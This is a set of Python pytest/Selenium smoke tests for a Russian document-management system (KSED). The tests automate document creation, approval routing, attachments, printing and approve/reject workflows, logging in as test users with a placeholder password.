@allure.feature('Возврат РД на доработку с подписания')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12907(web_browser):
""" Возврат РД на доработку с подписания. """
page = KSEDRD_DorabPodpis(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
Podpisanie_Otklon = page.Podpisanie_Otklon()
REJECTED = page.NapPodpis()
@allure.feature('Подписание РД')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12934(web_browser):
""" Подписание РД. """
page = KSEDRD_Podpis(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
Podpis = page.Podpis()
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11679 import KSEDCreatDocReestr
@allure.feature('Создание Реестра')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11679(web_browser):
""" Создание реестра. """
page = KSEDCreatDocReestr(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
# При каждом прогоне теста необходимо обновлять тестовые данные:
# dataTest.BARCODE - повторное использование одного документа при создании реестра невозможно.
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk12957 import KSEDCreatDocREZ
@allure.feature('Создание Резолюции')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12957(web_browser):
""" Создание Резолюции. """
page = KSEDCreatDocREZ(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11691 import KSEDCreatDocSZ
from KSED.Tests.tk11704 import KSEDnaprSZSoglas
from KSED.Tests.tk12913 import KSEDPrintAttach
from KSED.Tests.tk12912 import KSEDPrintForm
@allure.feature('Создание Служебной записки')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11691(web_browser):
""" Создание Служебной записки. """
page = KSEDCreatDocSZ(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
LinkDocWFile = page.LinkDocWFile()
#@pytest.fixture(scope="session")
@allure.feature('Направление СЗ на согласование')
@pytest.mark.KSED_smoke_test
def test_11704(web_browser):
""" Направление СЗ на согласование. """
page = KSEDnaprSZSoglas(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
Attach = page.attachment()
NaprNaSogl = page.NapSoglasovanie()
#@pytest.fixture(scope="session")
@allure.feature('Печать вложений документа')
@pytest.mark.KSED_smoke_test
def test_12913(web_browser):
""" Печать вложений документа. """
page = KSEDPrintAttach(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
printAttach = page.printAttach()
#is_element_present = page.is_element_present()
#@pytest.fixture(scope="session")
@allure.feature('Печать в разделе "Печатные формы"')
@pytest.mark.KSED_smoke_test
def test_12912(web_browser):
""" Печать в разделе "Печатные формы". """
page = KSEDPrintForm(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
printForm = page.printForm()
#is_element_present = page.is_element_present()
--- FILE SEPARATOR ---
# #!/bin/sh
# #!/usr/bin/python3
#
# # -*- encoding=utf8 -*-
#
#
#
# # How to run:
#
# #.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... allure generate ./allure_report && allure open allure-report
# # -s команда вывода всех print в консоль
#
#
#
import pytest
import allure
from KSED.Tests.tk12022 import KSEDallurInDoc
from KSED.Tests.tk12029 import KSEDallurReestr
from KSED.Tests.tk12030 import KSEDallurResolution
from KSED.Tests.tk12011 import KSEDStatAllureVidDic
from KSED.Tests.tk12006 import KSEDallur
from KSED.Tests.tk11677 import KSEDCreateZap
from KSED.Tests.tk11702 import KSEDredZap
from KSED.Tests.tk11742 import KSEDexpZap
from KSED.Tests.tk11744 import KSEDexp_Zap
from KSED.Tests.tk11705 import KSEDdelZap
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11677(web_browser):
""" создание запроса """
page = KSEDCreateZap(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11702(web_browser):
""" редактирование запроса """
page = KSEDredZap(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11742(web_browser):
""" действия с выбранными документами в запросе """
page = KSEDexpZap(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11744(web_browser):
""" экспорт документов """
page = KSEDexp_Zap(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_11705(web_browser):
""" удаление запроса """
page = KSEDdelZap(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
--- FILE SEPARATOR ---
# Наведение
# self.vlozheniya.move_to_element()
# self.attachments.wait_to_be_clickable()
# self.attachments.click()
# Ожидание и нажатие на кнопку
# self.dropBtn_2.scroll_to_element()
# self.dropBtn_2.wait_to_be_clickable()
# self.dropBtn_2.click()
# обновить страницу
# self.get(self._web_driver.current_url)
# ожидание пока не пропадет "Загрузка"
#self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
# Проверка появилась ли кнопка
# try:
# self.btnRejectInnerSogl.wait_to_be_clickable()
# except:
# assert False, 'Кнопка не появилась'
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11645 import KSEDCreatDocISH
from KSED.Tests.tk11644 import KSEDCreatDocVH
from KSED.Tests.tk11679 import KSEDCreatDocReestr
from KSED.Tests.tk11691 import KSEDCreatDocSZ
from KSED.Tests.tk12929 import KSEDRD_sendPodpis
from KSED.Tests.T715 import KSEDreturnDisAfterTakeTask
from KSED.Tests.T716 import KSEDsoftDisFromDelegatAfterReject_RD
from KSED.Tests.T717 import KSEDsoftDisAfterTakeTask
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
#
# def test_11645(web_browser):
#
# """ Создание Исходящий документ. """
#
# page = KSEDCreatDocISH(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# Creat_doc = page.Creat()
#
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
#
# def test_11644(web_browser):
#
# """ Создание Исходящий документ. """
#
# page = KSEDCreatDocVH(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# Creat_doc = page.Creat()
#
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
# def test_11679(web_browser):
#
# """ Создание реестра """
#
# page = KSEDCreatDocReestr(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# Creat_doc = page.Creat()
#
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
# def test_11691(web_browser):
#
# """ Создание Исходящий документ. """
#
# page = KSEDCreatDocSZ(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# Creat_doc = page.Creat()
#
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
#
#
# def test_12929(web_browser):
#
# """ Направление на согласование РД """
#
# page = KSEDRD_sendPodpis(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# getDoc = page.getDoc()
#
# NaprNaSogl = page.NapPodpis()
#
# @allure.feature('Создание Исходящий документ')
# @pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
#
#
# def test_11644(web_browser):
#
# """ Создание Исходящий документ. """
#
# page = KSEDCreatDocVH(web_browser)
#
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#
# Creat_doc = page.Creat()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18361(web_browser):
""" Отзыв решения после согласования делегата"""
# Шаг 1 создание документа
page = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 забрать задачу
page2 = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page2.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
take = page2.takeTask_RD()
reject = page2.rejectDoc()
Logout = page.USER_LOGOUTs() # Выход из системы
page3 = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page3.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
returnDis = page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
def test_18362(web_browser):
""" Отзыв решения делегата после отклонения согласования основного согласующего"""
# Шаг 1 создание документа
page = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Шаг 2 создание маршрута
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
reject = page2.rejectDoc()
Logout = page.USER_LOGOUTs() # Выход из системы
page3 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page3.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
returnDis = page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
def test_18363(web_browser):
""" Смягчение решения после согласования делегата"""
# Шаг 1 создание документа
page = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 забрать задачу
page2 = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page2.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
take = page2.takeTask_RD()
reject = page2.rejectDoc()
Logout = page.USER_LOGOUTs() # Выход из системы
page3 = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page3.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
returnDis = page3.softDecision_RD()
--- FILE SEPARATOR ---
# #!/bin/sh
# #!/usr/bin/python3
#
# # -*- encoding=utf8 -*-
#
#
#
# # How to run:
#
# #.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py::test_15772 --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v test_smoke.py --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py::test_18338 --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v --driver IE --driver-path WebDriver\IEDriverServer --alluredir ./allure_report
#IEDriver
# #.... allure generate ./allure_report && allure open allure-report
# # -s команда вывода всех print в консоль
#
#
#
import pytest
import allure
from KSED.Tests.T681 import KSEDCreatDocCS_RD
from KSED.Tests.T682 import KSEDCreatDocCS_LND
from KSED.Tests.T683 import KSEDCreatDocCS_ETC
from KSED.Tests.T685 import KSEDCreatWaySogl
from KSED.Tests.T686 import KSEDCreatWaySogl_RD
from KSED.Tests.T684 import KSEDaddPerson
from KSED.Tests.T687 import KSEDNaprSogl_RD
from KSED.Tests.T688 import KSEDaddNewVersion
from KSED.Tests.T689 import KSEDaddNewAtt
from KSED.Tests.T691 import KSEDreject_RD
from KSED.Tests.T690 import KSEDacceptSogl_RD
from KSED.Tests.T692 import KSEDinnerSogl_RD
from KSED.Tests.T693 import KSEDrejectInnerSogl_RD
from KSED.Tests.T694 import KSEDrejectTaskInnerSogl_RD
from KSED.Tests.T695 import KSEDrepeatInnerSogl_RD
from KSED.Tests.T696 import KSEDAcceptInnerSogl_RD
from KSED.Tests.T697 import KSEDaddComment
from KSED.Tests.T700 import KSEDtakeTask
from KSED.Tests.T701 import KSEDbackTask
from KSED.Tests.T702 import KSEDreturnDecision_RD
from KSED.Tests.T703 import KSEDsoftDecision_RD
from KSED.Tests.T704 import KSEDchangeAfterRejectInnerSogl_RD
from KSED.Tests.T705 import KSEDsoftDesAfterRejectInnerSogl_RD
from KSED.Tests.T706 import KSEDchangeAfterAcceptInnerSogl_RD
from KSED.Tests.T707 import KSEDchangeAfterAcceptWithRemarkInnerSogl_RD
from KSED.Tests.T708 import KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD
from KSED.Tests.T709 import KSEDaddCommentInnerSogl_RD
from KSED.Tests.T710 import KSEDInnerSoglAfterAddComment_RD
from KSED.Tests.T711 import KSEDacceptSoglwithRemark_RD
from KSED.Tests.T712 import KSEDrejectAfterAcceptSoglwithRemark_RD
from KSED.Tests.T713 import KSEDsoftDisAfterAcceptSoglwithRemark_RD
from KSED.Tests.T714 import KSEDreturnDisFromDelegatAfterReject_RD
from KSED.Tests.T715 import KSEDreturnDisAfterTakeTask
from KSED.Tests.T716 import KSEDsoftDisFromDelegatAfterReject_RD
from KSED.Tests.T717 import KSEDsoftDisAfterTakeTask
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_681(web_browser):
""" СОЗДАНИЕ КАРТОЧКИ СОГЛАСОВАНИЯ ВИДА «РД» """
page = KSEDCreatDocCS_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_682(web_browser):
""" СОЗДАНИЕ КАРТОЧКИ СОГЛАСОВАНИЯ ВИДА «ЛНД»"""
page = KSEDCreatDocCS_LND(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_683(web_browser):
""" СОЗДАНИЕ КАРТОЧКИ СОГЛАСОВАНИЯ ВИДА «ПРОЧИЕ» """
page = KSEDCreatDocCS_ETC(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_684(web_browser):
""" Добавление сотрудника в этап согласования """
page = KSEDaddPerson(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
create_route = page.creation_of_the_approval_route()
# create_route = page.creation_of_the_approval_route()
#
# Attach = page.attachment()
#
# NaprNaSogl = page.NapSoglasovanie()
# saveLink = page.LinkDocWFile()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_685(web_browser):
""" ФОРМИРОВАНИЕ МАРШРУТА СОГЛАСОВАНИЯ (Индивидуальный маршрут) """
page = KSEDCreatWaySogl(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
create_route = page.creation_of_the_approval_route()
# Attach = page.attachment()
# NaprNaSogl = page.NapSoglasovanie()
# saveLink = page.LinkDocWFile()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_686(web_browser):
""" ФОРМИРОВАНИЕ МАРШРУТА СОГЛАСОВАНИЯ (Типовой маршрут) """
# Шаг 1 создание документа
page = KSEDCreatWaySogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDCreatWaySogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_687(web_browser):
""" НАПРАВЛЕНИЕ ДОКУМЕНТА НА СОГЛАСОВАНИЕ """
# Шаг 1 создание документа
page = KSEDNaprSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Шаг 2 создание маршрута
create_route = page.creation_of_the_approval_route()
# Шаг 3 направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_688(web_browser):
""" ЗАГРУЗКА НОВОЙ ВЕРСИИ ВЛОЖЕНИЯ В СТАТУСЕ «НА СОГЛАСОВАНИИ» """
# Шаг 1 создание документа
page = KSEDaddNewVersion(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDaddNewVersion(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
# Шаг 4 возврат с согласования
reject = page.rejectYourself()
# Шаг 5 загрузка новой версии файла
attach = page.attachment_docReady()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_689(web_browser):
""" ЗАГРУЗКА ВЛОЖЕНИЯ В СТАТУСЕ «НА СОГЛАСОВАНИИ» """
# Шаг 1 создание документа
page = KSEDaddNewAtt(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDaddNewAtt(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
# Шаг 4 возврат с согласования
reject = page.rejectYourself()
# Шаг 5 загрузка нового файла
attach = page.attachment_NewDoc()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_690(web_browser):
""" ОСНОВНОЕ СОГЛАСОВАНИЕ """
# Шаг 1 создание документа
page = KSEDacceptSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDacceptSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDacceptSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
accept = page2.acceptDoc()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_691(web_browser):
""" ООСНОВНОЕ СОГЛАСОВАНИЕ (Отклонение документа) """
# Шаг 1 создание документа
page = KSEDreject_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Шаг 2 создание маршрута
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDreject_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
reject = page2.rejectDoc()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_692(web_browser):
""" ВНУТРЕННЕЕ СОГЛАСОВАНИЕ """
# Шаг 1 создание документа
page = KSEDinnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDinnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_693(web_browser):
""" ВНУТРЕННЕЕ СОГЛАСОВАНИЕ (Отзыв с внутреннего согласования) """
# Шаг 1 создание документа
page = KSEDrejectInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDrejectInnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 направление на внутреннее согласования
page2 = KSEDrejectInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
# Шаг 5 отзыв внутреннего согласования
rejectInnerSogl = page2.rejectInnerSogl()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_694(web_browser):
""" ВНУТРЕННЕЕ СОГЛАСОВАНИЕ (Отзыв задачи внутреннего согласования у внутреннего согласующего) """
# Шаг 1 создание документа
page = KSEDrejectTaskInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDrejectTaskInnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDrejectTaskInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
rejectTaskInnerSogl = page2.rejectTaskInnerSogl()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_695(web_browser):
""" ВНУТРЕННЕЕ СОГЛАСОВАНИЕ (Повторная отправка на внутреннее согласование) """
# Шаг 1 создание документа
page = KSEDrepeatInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Шаг 2 создание маршрута
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDrepeatInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
rejectTaskInnerSogl = page2.rejectTaskInnerSogl()
repeatInnerApp = page2.repeatInnerSogl()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_696(web_browser):
""" Внутреннее согласование - вынесение решения"""
# Шаг 1 создание документа
page = KSEDAcceptInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDAcceptInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 согласование на внутреннее согласование
page3 = KSEDAcceptInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('tst_user11', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.AcceptInnerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_697(web_browser):
""" РАБОТА С ЗАМЕЧАНИЯМИ (Внесение замечаний к документу) """
# Шаг 1 создание документа
page = KSEDaddComment(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDacceptSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDaddComment(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
addComment = page2.addComment()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_700(web_browser):
""" ВЫПОЛНЕНИЕ ДЕЙСТВИЯ «ЗАБРАТЬ ЗАДАЧУ «СОГЛАСОВАТЬ ДОКУМЕНТ»"""
# Шаг 1 создание документа
page = KSEDtakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDtakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 забрать задачу
page2 = KSEDtakeTask(web_browser)
LogIn_page = page2.LogIN('tst_user1', 'Changeme!')
